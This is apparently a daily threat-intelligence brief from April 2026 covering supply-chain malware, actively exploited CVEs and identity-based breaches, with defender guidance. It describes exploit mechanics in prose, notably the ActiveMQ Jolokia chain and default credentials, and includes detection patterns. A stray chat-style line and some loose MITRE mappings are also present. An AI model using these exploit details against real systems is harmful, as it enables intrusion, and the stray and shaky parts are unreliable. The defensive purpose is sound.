Last Updated On

DDAAIILLYY--22002266--00442288
CCrriittiiccaall
AAccttiivvee  EExxppllooiittaattiioonn  CCoonnffiirrmmeedd

Supply Chain Attacks Hit Dev Tools as ShinyHunters Claims Millions

Seven active threat incidents define the 28 April 2026 threat picture: GlassWorm deploys 73 sleeper extensions across OpenVSX targeting developer credentials, the elementary-data PyPI package is backdoored via CI pipeline forgery, and Apache ActiveMQ CVE-2026-34197 carries a 48-hour federal patch deadline with over 6,400 exposed instances unpatched. ShinyHunters confirms breaches at ADT and Medtronic through Okta vishing and Salesforce exfiltration, CISA expands the KEV catalog with four new entries covering SimpleHelp, Samsung MagicINFO 9, and the end-of-life D-Link DIR-823X, and SharePoint CVE-2026-32201 remains under active attack with its federal deadline elapsed. The dominant theme across all seven incidents is the systematic targeting of trusted developer tooling, identity platforms, and OAuth trust chains as the primary kill chain entry points, reinforcing that the security perimeter has fundamentally shifted from the network edge to the software supply chain and identity layer.

9.9

CVSS Score

3

IOC Count

7

Source Count

78

Confidence Score

CVEs

CVE-2026-34197 CVE-2024-57726 CVE-2024-57728 CVE-2024-7399 CVE-2025-29635 CVE-2026-32201 CVE-2009-0238 CVE-2026-33825 CVE-2026-33827 CVE-2026-33826

Actors

GlassWorm, ShinyHunters

Sectors

Government, Healthcare, Home Security, Technology and Software Development, Cloud and SaaS, IT Infrastructure, Financial Services.

Regions

Global, with the United States carrying primary regulatory deadline impact under CISA BOD 22-01.

Chapter 01 - Executive Overview

Today's threat picture is dominated by compounding software supply chain risk across the developer ecosystem, concurrent critical vulnerability exploitation with imminent federal deadlines, and a confirmed data extortion campaign against two major US organizations. No single threat actor is responsible for the full picture; the risk this brief communicates is systemic across tooling, infrastructure, and identity layers simultaneously.

Intelligence Quality
Core findings for the Apache ActiveMQ, SharePoint, and CISA KEV expansion incidents are supported by authoritative government sources and carry confidence scores above 90. The GlassWorm, elementary-data, and Vercel incidents rely primarily on standard and non-registry sources and carry moderate confidence. ShinyHunters attribution is well corroborated by victim statements and independent breach notification services. MITRE mappings across all incidents are behaviorally inferred, not source-confirmed.

Incident 1: GlassWorm OpenVSX Sleeper Extensions (Severity: High)
The GlassWorm campaign has returned with a second wave of 73 cloned sleeper extensions on the OpenVSX marketplace. The extensions appear legitimate at installation and are later updated to deliver malware targeting developer credentials and cryptocurrency wallet data. At least six of the 73 have already been activated in live environments. Prior GlassWorm activity has compromised more than 433 components across GitHub, npm, VS Code, and OpenVSX since October 2025, using invisible Unicode character obfuscation and Solana blockchain-backed command and control to evade standard detection.
Risk decision: Escalate. Developer environments are active attack surfaces and infected extensions can propagate malicious code into production artifacts and downstream customer environments.

Incident 2: elementary-data PyPI Backdoor (Severity: High)
An attacker exploited a GitHub Actions script injection weakness to forge a signed release of the elementary-data data observability package, version 0.23.3, pushing an infostealer to both PyPI and GitHub Container Registry. The package has over 1.1 million monthly downloads and is deeply embedded in dbt-based analytics pipelines. Any environment that installed version 0.23.3 or deployed containers from that tag must be treated as potentially compromised, with cloud credentials, SSH keys, and database passwords considered exposed. A clean version 0.23.4 is now available.
Risk decision: Escalate. Immediate dependency audit and credential rotation required for any organization running dbt-native data stacks.

Incident 3: Apache ActiveMQ CVE-2026-34197 (Severity: Critical, 48-Hour Federal Deadline)
Apache ActiveMQ's Jolokia JMX management interface contains a code injection vulnerability allowing authenticated attackers to execute arbitrary operating system commands on the broker by supplying an attacker-controlled Spring XML configuration URI. CISA has added it to the Known Exploited Vulnerabilities catalog with a federal remediation deadline of 30 April 2026, two days from this report. Over 6,400 internet exposed instances remain unpatched. The flaw existed in the codebase for 13 years before its discovery.
Risk decision: Escalate immediately. Patch or remove Jolokia endpoint access before the April 30 deadline. Treat as Priority 1 for any organization running Apache ActiveMQ Classic.

Incident 4: CISA KEV Expansion: SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X (Severity: Critical, May 8 Deadline)
CISA added four CVEs to the KEV catalog on 24 April 2026 covering SimpleHelp remote support software (CVE-2024-57726, CVSS 9.9, and CVE-2024-57728), Samsung MagicINFO 9 Server (CVE-2024-7399, CVSS 8.8), and the end-of-life D-Link DIR-823X router (CVE-2025-29635, CVSS 7.5). All carry confirmed active exploitation. The D-Link device will not receive a patch; CISA requires organizations to discontinue use immediately.
Risk decision: Escalate. Patch SimpleHelp and Samsung MagicINFO 9 before May 8. Replace D-Link DIR-823X immediately with a supported device.

Incident 5: Microsoft SharePoint CVE-2026-32201 and Excel CVE-2009-0238 KEV (Severity: Critical, Federal Deadline Elapsed)
CISA confirmed active exploitation of SharePoint spoofing vulnerability CVE-2026-32201 and added it to the KEV catalog with an April 28 federal deadline that has elapsed at this report's publication. Over 1,300 internet exposed SharePoint servers remain unpatched. CVE-2009-0238, a legacy Microsoft Excel RCE carrying a CVSS of 9.3, was added to the same KEV batch. Successful SharePoint exploitation enables unauthorized viewing and modification of sensitive collaboration content without requiring privilege escalation.
Risk decision: Escalate. Any unpatched internet-facing SharePoint instance is actively targeted. Patch or take offline immediately.

Incident 6: ShinyHunters ADT and Medtronic Extortion (Severity: High for Affected Organizations and Peer Sectors)
ShinyHunters compromised ADT via voice phishing against an Okta SSO account, then used the resulting access to exfiltrate personal data on 5.5 million individuals from Salesforce. The group claims a separate theft of 9 million records from Medtronic; Medtronic has confirmed system access while the scope of personal data exposure remains under investigation. These incidents demonstrate that SSO platforms and CRM applications are now primary targets for large-scale PII extortion, requiring no exploit of a technical vulnerability.
Risk decision: Monitor and escalate for organizations with similar identity and SaaS footprints. Review Okta and Salesforce access controls. Conduct vishing awareness and helpdesk social engineering training immediately.

Incident 7: Vercel and Context.AI OAuth Supply Chain (Severity: High, Lower Confidence)
A Lumma Stealer infection at Context.AI led to OAuth token exfiltration, which the attacker used to access a Vercel employee's Google Workspace and enumerate customer environment variables. Stolen data is listed on BreachForums at $2 million. Confidence on this incident is lower than others in this brief due to reliance on non-registry primary sources.
Risk decision: Escalate for Vercel customers. Audit Google Workspace OAuth authorizations and rotate all non-sensitive environment variable secrets immediately.

Priority Order for Defenders Today:

  1. Apache ActiveMQ CVE-2026-34197: patch or restrict Jolokia access before 30 April 2026.

  2. Microsoft SharePoint CVE-2026-32201: patch or isolate internet-facing instances immediately, federal deadline has elapsed.

  3. CISA KEV Expansion: patch SimpleHelp and Samsung MagicINFO 9 before May 8; replace D-Link DIR-823X now.

  4. GlassWorm: freeze new extension installs; audit extension inventories in developer and CI environments.

  5. elementary-data: identify all 0.23.3 deployments and rotate all exposed credentials now.

  6. ShinyHunters: review Okta and Salesforce access controls; harden vishing defenses.

  7. Vercel and Context.AI: audit OAuth third-party app authorizations; rotate environment variable secrets.

Chapter 02 - Threat & Exposure Analysis

GlassWorm: Multi-Ecosystem Supply Chain Compromise via Sleeper Extensions

What is happening: GlassWorm is an evolving malware campaign that has systematically targeted developer extension ecosystems since October 2025, beginning with VS Code Marketplace and expanding to OpenVSX, GitHub, and npm. The campaign's latest wave introduces 73 cloned sleeper extensions that install as apparently benign tools and receive later updates activating malicious payloads. At least six of these extensions have already been activated to deliver credential-stealing and cryptocurrency-wallet-targeting malware. Prior waves compromised over 433 components across multiple ecosystems by hijacking legitimate extensions and repository infrastructure, using invisible Unicode characters to hide malicious logic inside visible source code, and using Solana blockchain infrastructure as command and control to route attacker instructions through a channel that evades domain-based network detection.

Strategic risk context: Developer workstations and CI/CD infrastructure function as the upstream entry point into downstream customer environments and signed production artifacts. A single infected extension installed in a build agent can inject malicious code into multiple software products, propagating the compromise to downstream users without any of those users taking a direct action. Organizations without strict extension allow-listing and provenance verification face elevated risk that their own codebases, signing keys, and distribution channels could be co-opted into further supply chain attacks.

Severity and business impact: If GlassWorm gains persistent access to developer credentials and repositories, attackers can silently introduce backdoors into software that ships to customers, leading to large-scale incident response obligations, regulatory scrutiny, and remediation costs that extend well beyond the initial workstation compromise. Because this campaign targets developers rather than a specific industry vertical, the blast radius spans software vendors, SaaS providers, financial technology teams, and internal enterprise engineering organizations simultaneously.

Confidence: 65. BleepingComputer and The Hacker News reporting is consistent across multiple waves. Non-registry sources (Socket Security, VicOne, Koi Security, Aikido, OpenSourceMalware) provide corroborating technical detail on infrastructure traits, payload behaviors, and extension lists. No CISA advisory or T1 vendor research organization has published a formal analysis of GlassWorm within the reporting window.

elementary-data: PyPI and Docker Supply Chain Backdoor in a Data Observability Tool

What is happening: An attacker exploited a GitHub Actions script injection weakness to forge a signed release of the elementary-data package. The attack was triggered by posting a malicious comment on an open pull request, causing the CI workflow to execute attacker-controlled shell code, exfiltrate the GITHUB_TOKEN, and forge a signed commit and release tag for version 0.23.3. The release pipeline then built and pushed a malicious PyPI package and a corresponding multi-architecture Docker image with tags 0.23.3 and latest, embedding an infostealer targeting developer credentials, cloud API keys, SSH keys, and database passwords. A clean version 0.23.4 replaced the malicious build after discovery.

Strategic risk context: elementary-data is a dbt-native data observability tool with over 1.1 million monthly downloads used by data and analytics engineers running modern cloud-based data stacks. Compromising this package gives attackers direct access to CI/CD pipelines and data processing environments that handle sensitive cloud credentials and configuration files underpinning data integrity across analytics platforms. The use of a forged signed release means standard provenance checks would not have flagged the malicious version.

Severity and business impact: Any organization that installed elementary-data 0.23.3 or deployed containers built from the compromised image tags must treat those environments as potentially compromised. Cloud account takeover, data exfiltration, and pipeline integrity loss are all plausible downstream consequences. Even where immediate exploitation did not occur, incident response and credential rotation will impose significant operational disruption on affected data engineering teams.

Confidence: 65. BleepingComputer and StepSecurity (non-registry) describe consistent attack mechanics. The artifact IOCs (version strings and Docker tags) are directly actionable. No T1 registered source has independently confirmed this incident within the reporting window.

Apache ActiveMQ CVE-2026-34197: Pre-Auth-Adjacent RCE via Jolokia JMX Bridge

What is happening: Apache ActiveMQ Classic exposes a JMX-over-HTTP management interface via the Jolokia endpoint at /api/jolokia/ on the web console (default port 8161). The default Jolokia access policy permits unrestricted exec operations on all ActiveMQ MBeans, including BrokerService.addNetworkConnector. An attacker who can reach this endpoint and authenticate (default credentials admin:admin are widespread in unmanaged deployments) can supply a discovery URI containing a brokerConfig parameter pointing to an attacker-controlled URL. The ActiveMQ VM transport layer fetches that URL and instantiates it as a Spring ResourceXmlApplicationContext, processing all singleton bean definitions before any BrokerService validation occurs. This allows arbitrary OS command execution via Runtime.exec() embedded in Spring bean factory methods. The flaw existed in the ActiveMQ codebase for 13 years and was identified by a researcher using AI-assisted static analysis. Fixed in Apache ActiveMQ Classic 5.19.4 and 6.2.3.

Strategic risk context: Apache ActiveMQ is one of the most widely deployed open source message brokers globally, used in enterprise integration, microservices, and financial services transaction processing. Internet exposure of the management interface is a common misconfiguration. Over 6,400 instances remain unpatched and internet-accessible as of BleepingComputer reporting within the window. The CISA KEV listing with a 48-hour federal deadline signals active exploitation is confirmed and adversaries are actively scanning for and attempting to exploit vulnerable instances.

Severity and business impact: Full operating system command execution in the context of the ActiveMQ service account. In environments where the broker runs with elevated or administrative privileges, this translates directly to full system compromise. Downstream risk includes ransomware pre-staging, lateral movement to message queue consumers, and integrity compromise of business-critical transaction processing pipelines.

Confidence: 92. CISA KEV authoritative confirmation, NVD record confirmed, BleepingComputer and The Hacker News corroboration. No conflicts across sources.

CISA KEV Expansion: SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X

What is happening: CISA added four CVEs to the KEV catalog on 24 April 2026 covering three products. CVE-2024-57726 (CVSS 9.9) and CVE-2024-57728 in SimpleHelp remote support software represent a missing authorization flaw enabling unauthenticated server actions and a companion path traversal flaw. CVE-2024-7399 (CVSS 8.8) in Samsung MagicINFO 9 Server allows an unauthenticated attacker to write arbitrary files as SYSTEM via path traversal, enabling web shell deployment. CVE-2025-29635 (CVSS 7.5) in the D-Link DIR-823X is a command injection via POST to /goform/ on an end-of-life device that will receive no patch. CISA's language for the D-Link is unambiguous: discontinue use immediately.

Strategic risk context: SimpleHelp is widely deployed as a remote support and helpdesk access platform; exploitation enables persistent attacker access to every endpoint managed through that platform, making it an effective ransomware pre-staging vector. Samsung MagicINFO 9 is present in healthcare, retail, and critical infrastructure facilities where digital signage hardware is connected to internal networks. D-Link DIR-823X EOL devices are common in home office and SMB environments, particularly in regions where device refresh cycles are slow.

Confidence: 90. CISA KEV authoritative confirmation for all four CVEs. SecurityWeek and The Hacker News provide consistent corroborating reporting.

Microsoft April 2026 KEV Cluster: SharePoint Spoofing, Legacy Excel RCE, Defender EoP, TCP/IP and AD RCE

What is happening: Microsoft's April 14, 2026 Patch Tuesday addressed 167 vulnerabilities. CVE-2026-32201 (SharePoint Server spoofing, CVSS 6.5) was exploited as a zero day before the patch was released and has been added to the CISA KEV with an April 28 federal deadline. Over 1,300 internet exposed SharePoint servers remain unpatched as of reporting within the window. CVE-2009-0238 (Excel legacy RCE, CVSS 9.3) was added to the same KEV batch, reflecting continued active use of document-based attack chains. CVE-2026-33825 (Microsoft Defender EoP, CVSS 7.8) allows a local user to reach SYSTEM by abusing the Defender signature update process; the fix is auto-deployed in platform version 4.18.26030.3011 but requires manual action in air-gapped environments. CVE-2026-33827 (Windows TCP/IP RCE, CVSS 8.1) exploits a race condition for unauthenticated remote code execution at high attack complexity with no user interaction. CVE-2026-33826 (Windows Active Directory RCE, CVSS 8.0) requires authentication but carries low complexity with no user interaction. Neither TCP/IP nor AD RCE CVEs have confirmed active exploitation at report date.

Strategic risk context: SharePoint is the collaboration backbone for thousands of enterprises globally. Active exploitation of a spoofing vulnerability against over 1,300 exposed servers means attackers can exfiltrate and manipulate sensitive internal documents and workflows without triggering availability-based alerts. The re-addition of a 2009 Excel RCE to the KEV catalog is a persistent reminder that legacy document-based phishing chains remain operationally active and that attachment-based delivery of malicious Excel files continues to achieve exploitation in current environments.

Confidence: 90 for SharePoint CVE-2026-32201 and CVE-2009-0238 (CISA KEV authoritative). 78 for Defender CVE-2026-33825 (CrowdStrike elevated, BleepingComputer corroboration). 75 for TCP/IP and AD RCE CVEs (CrowdStrike elevated, no exploitation confirmed).

ShinyHunters: Extortion Campaign Against ADT and Medtronic

What is happening: ShinyHunters used voice phishing to compromise an ADT employee's Okta SSO account. Using those credentials, the group accessed ADT's Salesforce CRM instance and exfiltrated personal data on 5.5 million individuals including names, phone numbers, addresses, dates of birth, and the last four digits of SSNs or Tax IDs for a subset. Have I Been Pwned independently confirmed the dataset. Separately, ShinyHunters claimed theft of 9 million records from Medtronic. Medtronic confirmed that hackers accessed certain corporate IT systems but the scope of personal data exposure remains under investigation.

Strategic risk context: These incidents confirm that SSO platforms and SaaS CRM applications are now primary attack targets for mass PII extortion. The attack required no zero-day vulnerability and no novel exploit. A single successful vishing call against a helpdesk or employee sufficed to unlock access to millions of customer records. For organizations running Okta and Salesforce with large PII datasets, the attack pattern from the ADT breach is directly replicable against their environments today.

Severity and business impact: For ADT and Medtronic, the incidents carry immediate regulatory notification obligations, litigation exposure, and reputational damage. ADT's confirmed exposure of partial SSN and Tax ID data for a subset of 5.5 million individuals creates significant risk of downstream identity fraud for affected individuals. For peer organizations, the primary takeaway is not a new exploit to patch but a process failure to remediate: weak vishing defenses and insufficient MFA enforcement on SSO access to high-value SaaS platforms.

Confidence: 70. BleepingComputer reporting, corroborated by direct victim statements from ADT and Medtronic and independent Have I Been Pwned dataset confirmation. Medtronic data scope remains under investigation, contributing minor uncertainty.

Vercel and Context.AI OAuth Supply Chain

What is happening: A Lumma Stealer infection at Context.AI, a third-party AI productivity tool, led to OAuth token exfiltration from an employee machine. The attacker used the stolen OAuth token to access a Vercel employee's Google Workspace, to which Context.AI had been granted broad Google Drive read scope. From there, the attacker accessed Vercel internal systems and enumerated environment variables for a subset of customer projects. Vercel's non-sensitive environment variables were not encrypted at rest, enabling the attacker to retrieve secrets in plaintext. The dataset was listed for sale on BreachForums at $2 million.

Strategic risk context: This incident demonstrates how OAuth trust relationships between AI productivity tools and enterprise platforms create invisible lateral movement paths that bypass perimeter defenses entirely. The attack required no exploitation of a Vercel vulnerability; it exploited the delegated trust that Vercel's employee had granted to a third-party tool. As AI-adjacent productivity tools proliferate in enterprise environments, each OAuth integration represents a potential pivot point into corporate infrastructure.

Confidence: 52. Primary sources are non-registry (Trend Micro, OX Security, Vercel self-disclosure). Attribution is unconfirmed. Lumma Stealer identification is from Trend Micro only. BreachForums listing corroborates exfiltration but does not confirm actor identity.

Chapter 03 - Operational Response

GlassWorm: Immediate Response and Containment

Containment priorities:

  1. Freeze new extension installs: halt all new OpenVSX and VS Code extension installations in production-adjacent developer and CI/CD environments until extension inventories are audited against known GlassWorm-associated publishers and the 73 sleeper extension list published by Socket Security and The Hacker News.

  2. Audit existing extensions: export extension lists from all developer IDEs and CI build agents. Cross-reference against GlassWorm-associated publisher names and suspicious clone identifiers from non-registry research reports. Flag any extension from an unverified publisher installed in the last six months.

  3. Isolate compromised hosts: any developer workstation found running confirmed or suspected GlassWorm extensions should be isolated from the network, imaged for forensic preservation, and rebuilt from known-good baselines. Rotate all credentials, tokens, and SSH keys that were accessible on the host.

Security hardening actions:
Implement extension allow-listing for critical developer environments permitting only approved, internally vetted extensions. Enforce EDR policies on developer machines tuned to detect abnormal browser-based credential file access, wallet database reads, SOCKS proxy creation, and hidden remote access tool activity consistent with GlassWorm payload behavior as described in VicOne analysis.

Internal security coordination:
Notify application security, DevOps, and CI/CD platform owners. Require confirmation that extension inventories have been audited across all build tooling domains. Brief legal and compliance teams if internal artifact signing keys or distribution pipelines are found to have been accessed.

elementary-data PyPI Backdoor: Immediate Response and Containment

Containment priorities:

  1. Identify impacted workloads: search all dependency manifests, lock files, Dockerfiles, and CI job definitions for elementary-data==0.23.3 or image tags 0.23.3 and latest pulled during the exposure window. Any workload or pipeline that pulled from these identifiers must be treated as potentially compromised.

  2. Rotate all exposed secrets: immediately rotate cloud credentials, SSH keys, database passwords, and API tokens that were accessible to any elementary-data process or pipeline running version 0.23.3. Do not wait for forensic confirmation of exfiltration before rotating. Assume exposure.

  3. Rebuild from clean images: rebuild all affected containers and virtual machines from known-good images using elementary-data 0.23.4 or later. Verify package signatures and checksums from PyPI against the official project release provenance.

Security hardening actions:
Review all GitHub Actions workflows for script injection exposure via user-controlled input fields, including pull request titles, body text, and comments, and ensure those inputs are never interpolated directly into shell commands. Enforce least-privilege scoping and short-lived expiry for all CI tokens to minimize blast radius from any future GITHUB_TOKEN exfiltration.

Internal security coordination:
Engage data engineering and platform teams directly. Ensure they understand that a credential rotation and environment rebuild is required regardless of whether active exploitation has been confirmed in their specific environment. Coordinate with SecOps to monitor cloud API activity for anomalous access patterns from accounts whose credentials may have been in scope.

Apache ActiveMQ CVE-2026-34197: Isolation and Patch Prioritization (April 30 Deadline)

Containment priorities:

  1. Inventory all ActiveMQ instances: identify every Apache ActiveMQ Classic deployment running versions before 5.19.4 or between 6.0.0 and 6.2.3. Check activemq.xml for web console and Jolokia enablement.

  2. Block Jolokia externally: immediately apply firewall or ACL rules denying inbound connections to the Jolokia endpoint (/api/jolokia/) from all untrusted networks. If the Jolokia endpoint is not required for production operations, disable it entirely in activemq.xml.

  3. Restrict Jolokia MBean exec operations: in jolokia-access.xml, deny exec operations on org.apache.activemq type=Broker brokerName=* for all non-administrative principals. This is a compensating control only; patching remains mandatory.

  4. Patch before April 30: apply Apache ActiveMQ Classic 5.19.4 or 6.2.3 before the CISA KEV federal deadline. For private sector organizations: treat this as a Priority 1 patch with no exceptions.

Tactical actions (post-containment, within 72 hours):
Review broker logs for POST requests to /api/jolokia/exec/ containing addNetworkConnector or addConnector with external URI parameters. Check for outbound HTTP or HTTPS GET requests from the ActiveMQ JVM process (java.exe or activemq service PID) to external hosts, particularly fetching XML or configuration files. Rotate all ActiveMQ administrative credentials regardless of whether exploitation activity is confirmed in logs.

CISA KEV Expansion: SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X (May 8 Deadline)

Containment priorities:

  1. SimpleHelp: apply the latest vendor patch immediately. Restrict access to the SimpleHelp server administration interface by IP allowlist. Audit all session logs for unauthorized or anomalous administrative actions.

  2. Samsung MagicINFO 9: patch to the fixed version immediately. Audit all web-accessible file directories on the server for unexpected files with executable extensions (.jsp, .php, .aspx) indicative of web shell upload via CVE-2024-7399. Isolate from the corporate LAN until patching is complete where immediate remediation is not possible.

  3. D-Link DIR-823X: no patch will be released. Decommission and replace immediately. There is no compensating control that makes continued use of this device acceptable. CISA mandates discontinue use.

Microsoft KEV Cluster: SharePoint Patching, Defender Update Enforcement, Excel Policy

Containment priorities:

  1. SharePoint CVE-2026-32201: apply Microsoft's April 2026 Patch Tuesday update for SharePoint Server 2016, 2019, and Subscription Edition immediately. Federal deadline has elapsed. For instances that cannot be patched immediately, remove internet exposure via firewall rules or reverse proxy restriction until remediation is complete.

  2. Excel CVE-2009-0238: enforce email attachment policies blocking .xls and .xlsb file types from external senders. Ensure Protected View is enabled for all externally sourced Office documents. Confirm the April 2026 Patch Tuesday update has been applied on all Windows endpoints.

  3. Defender CVE-2026-33825: verify Defender Antimalware Platform version using Get-MpComputerStatus and confirming AMProductVersion is 4.18.26030.3011 or higher. Manually distribute to air-gapped or update-restricted environments that have not received automatic deployment.

  4. Windows TCP/IP CVE-2026-33827 and Active Directory CVE-2026-33826: apply April 2026 Patch Tuesday updates. No active exploitation confirmed at report date but the attack surface (unauthenticated network-reachable RCE for TCP/IP, low-complexity authenticated AD RCE) warrants prompt patching given adversary interest in these primitives.

ShinyHunters ADT and Medtronic: Identity Hardening Actions for Peer Organizations

Containment priorities (pattern-focused, for organizations with similar identity and SaaS profiles):

  1. Harden Okta SSO: enforce phishing-resistant MFA (FIDO2 or hardware token) for all users with access to CRM or data-intensive SaaS platforms. Remove SMS and voice call as MFA fallback options for high-privilege accounts.

  2. Restrict Salesforce and CRM access: review data export and bulk access permissions in Salesforce. Apply IP-based access restrictions and session policies requiring continuous identity verification for high-volume data operations.

  3. Enhance vishing defenses: update security awareness training and internal helpdesk verification protocols to include voice phishing and impersonation scenarios consistent with the ADT attack chain. Implement a callback verification process for any request to change SSO credentials, reset MFA, or grant new access.

Vercel and Context.AI: OAuth Audit and Secrets Rotation

Containment priorities:

  1. Audit Google Workspace OAuth authorizations: review all third-party app authorizations in Google Workspace Admin console. Revoke any authorization granted to Context.AI or to AI productivity tools with Google Drive, Gmail, or broader Workspace access scopes. Apply this review to all tools not on an approved application list.

  2. Rotate Vercel environment variables: for any project hosted on Vercel, rotate all secrets, API keys, database credentials, and cloud provider credentials stored as environment variables, particularly those not flagged as Sensitive in the Vercel dashboard, which were not encrypted at rest.

  3. Review Vercel deployment logs: examine API access logs for anomalous environment variable enumeration requests between February and April 2026.

Security hardening actions:
Move all production secrets to a dedicated secrets manager (HashiCorp Vault, AWS Secrets Manager, or equivalent) rather than platform-native environment variable storage. Enforce OAuth app allowlisting policies that prevent Workspace users from authorizing third-party applications without IT security review and approval.

Understood. From here forward: incidents referenced by name only, sources referenced by publication name only. No cluster labels, no registry codes anywhere in the report text.

FIELD 19 | IOC TYPES PRESENT

Confirmed artifact identifiers from BleepingComputer for the elementary-data PyPI Backdoor (3 indicators):

  1. PyPI package version string: elementary-data==0.23.3 (confirmed malicious release published to PyPI)

  2. Docker image tag: elementary-data:0.23.3 (confirmed malicious multi-architecture container build pushed to GitHub Container Registry)

  3. Docker image tag: elementary-data:latest (confirmed malicious during the exposure window; reverted to clean build after 0.23.4 release)

Partial IOC types referenced in non-registry sources (hunting pivots only, not formally counted):

GlassWorm OpenVSX Sleeper Wave: OpenVSX extension identifiers and publisher names for 73 sleeper clones per Socket Security and The Hacker News. Invisible Unicode character patterns embedded in extension source JavaScript. Solana blockchain command and control communication indicators per Koi Security (non-registry).

Apache ActiveMQ CVE-2026-34197: HTTP POST request patterns to /api/jolokia/exec/ containing addNetworkConnector or addConnector operations with external URI parameters. Spring XML payload patterns fetched by the broker JVM from attacker-controlled hosts. Both documented by Horizon3.ai (non-registry).

Vercel and Context.AI OAuth Supply Chain: OAuth application client identifiers associated with the Context.AI integration in Google Workspace admin logs. Vercel API enumeration request patterns via the project environment variable endpoint. Both from Trend Micro and OX Security (non-registry).

Microsoft SharePoint CVE-2026-32201: Network-based spoofing request patterns exist but Microsoft and CISA have not published specific network indicator sets for this CVE as of report date.

ShinyHunters ADT and Medtronic: No network IOCs published by BleepingComputer or any registered source for the ADT or Medtronic intrusion infrastructure.

CISA KEV Expansion (SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X): No network IOCs published in registered sources beyond CVE identifiers.

FIELD 20 | IOC ENRICHMENT STATUS

Pending for all incidents.

elementary-data PyPI Backdoor: The three artifact identifiers are immediately actionable as detection pivots in dependency scanning tools, software composition analysis platforms, and container registry audits. No sandbox analysis, reputation scoring, or dynamic behavioral enrichment has been confirmed in any registered source. Enrichment pending full vendor disclosure from the PyPI security team or StepSecurity.

GlassWorm OpenVSX Sleeper Wave: Extension IDs and publisher names published by Socket Security and The Hacker News provide blocking pivots for IDE extension policy enforcement and OpenVSX blocklists. No hash-level or sandbox enrichment confirmed in any registered source. Enrichment pending from Socket Security full indicator release.

Apache ActiveMQ CVE-2026-34197, CISA KEV Expansion, Microsoft KEV Cluster, Vercel and Context.AI, ShinyHunters ADT and Medtronic: No network IOCs confirmed in any registered source. CISA KEV listings provide CVE-level exploitation confirmation but do not include network indicators. Enrichment not applicable at report time for these incidents.

Recommended action: Cross-reference non-registry sources directly. Socket Security for GlassWorm extension IDs. Horizon3.ai for Apache ActiveMQ Jolokia payload patterns. Trend Micro for Vercel OAuth artifacts. Apply source weighting appropriately when operationalizing indicators from non-registry sources. Do not treat non-registry indicator sets as authoritative without independent corroboration from a registered source.

FIELDS 21 TO 30

FIELD 21 | MITRE TECHNIQUES

No registered source explicitly maps any incident in this report to MITRE ATT&CK technique IDs.

The following mappings are behaviorally inferred based on attack mechanics described in source reporting. Each entry states its behavioral basis. None should be treated as source-confirmed ATT&CK mappings. MITRE D3FEND countermeasures are included where applicable.

Apache ActiveMQ CVE-2026-34197:
T1190 Exploit Public-Facing Application. Behavioral basis: authenticated HTTP POST to internet-exposed Jolokia JMX endpoint on port 8161, triggering Spring ResourceXmlApplicationContext instantiation from attacker-controlled URI.
T1059.007 Command and Scripting Interpreter, JavaScript and JVM. Behavioral basis: Spring bean factory method invoking Runtime.exec() over the JMX bridge to achieve OS command execution inside the broker JVM process.
D3FEND countermeasure: D3-NTF Network Traffic Filtering to block external access to the Jolokia endpoint. D3-SCF Service Call Filtering to restrict BrokerService MBean exec operations via Jolokia access policy.

CISA KEV Expansion (SimpleHelp, Samsung MagicINFO 9, D-Link DIR-823X):
T1190 Exploit Public-Facing Application. Behavioral basis: all three product families expose network-accessible management or administration interfaces exploited via unauthenticated or low-privilege requests.
T1505.003 Server Software Component, Web Shell. Behavioral basis: Samsung MagicINFO 9 CVE-2024-7399 permits arbitrary file write as SYSTEM via path traversal, creating conditions directly suitable for web shell deployment on the signage server.
T1059.004 Command and Scripting Interpreter, Unix Shell. Behavioral basis: D-Link DIR-823X CVE-2025-29635 is a command injection via POST to the /goform/ endpoint, executing shell commands on the device.
D3FEND countermeasure: D3-NTF Network Traffic Filtering to block external access to SimpleHelp and MagicINFO admin ports. D3-PA Process Ancestry Analysis to detect unexpected child process spawning from the MagicINFO service process.

Vercel and Context.AI OAuth Supply Chain:
T1195.002 Supply Chain Compromise, Compromise Software Supply Chain. Behavioral basis: OAuth trust relationship between Context.AI and a Vercel employee's Google Workspace exploited as a lateral movement path without requiring exploitation of a vulnerability in Vercel's own infrastructure.
T1528 Steal Application Access Token. Behavioral basis: Lumma Stealer exfiltrated OAuth tokens from the Context.AI employee machine, which were then used to impersonate the service and access downstream systems.
T1199 Trusted Relationship. Behavioral basis: the attacker leveraged a legitimate third-party OAuth integration granted broad Google Drive read scope to pivot from Context.AI into Vercel's internal environment.
D3FEND countermeasure: D3-UA User Account Analysis to monitor OAuth app authorization scope changes. D3-OAA OAuth Authorization Analysis to detect unusual third-party app permissions.

GlassWorm OpenVSX Sleeper Wave:
T1195.002 Supply Chain Compromise, Compromise Software Supply Chain. Behavioral basis: GlassWorm plants malicious code in extensions distributed through trusted IDE marketplaces, targeting developer workstations and downstream CI/CD pipelines.
T1552.001 Unsecured Credentials, Credentials in Files. Behavioral basis: GlassWorm payloads target developer credential stores, SSH keys, and cryptocurrency wallet files accessible on developer workstations.
T1564.001 Hide Artifacts, Hidden Files and Directories. Behavioral basis: GlassWorm uses invisible Unicode characters to conceal malicious code within otherwise visible extension source files, evading visual code review.
T1071.001 Application Layer Protocol, Web Protocols. Behavioral basis: GlassWorm uses Solana blockchain-backed command and control communication, routing attacker instructions through legitimate blockchain infrastructure to evade domain-based detection.
D3FEND countermeasure: D3-SBV Software Binary Attestation to verify extension integrity against publisher signatures. D3-PA Process Ancestry Analysis to detect abnormal child process chains spawned from IDE processes.

elementary-data PyPI Backdoor:
T1195.002 Supply Chain Compromise, Compromise Software Supply Chain. Behavioral basis: attacker injected malicious code into the elementary-data release pipeline via GitHub Actions script injection triggered by a pull request comment.
T1552.004 Unsecured Credentials, Private Keys. Behavioral basis: the infostealer payload targets cloud credentials, SSH keys, database passwords, and API tokens accessible to the elementary-data process during pipeline execution.
T1059.004 Command and Scripting Interpreter, Unix Shell. Behavioral basis: the GitHub Actions workflow executed attacker-controlled shell code after script injection via a malicious pull request comment.
T1553.002 Subvert Trust Controls, Code Signing. Behavioral basis: the attacker forged a signed GitHub commit and tag for version 0.23.3 using an exfiltrated GITHUB_TOKEN, making the malicious release appear as a legitimate signed build.
D3FEND countermeasure: D3-SBV Software Binary Attestation to validate PyPI package signatures against trusted build provenance. D3-SCF Service Call Filtering to restrict GitHub Actions token scopes and permitted operations.

Microsoft KEV Cluster (SharePoint, Excel, Defender, TCP/IP, Active Directory):
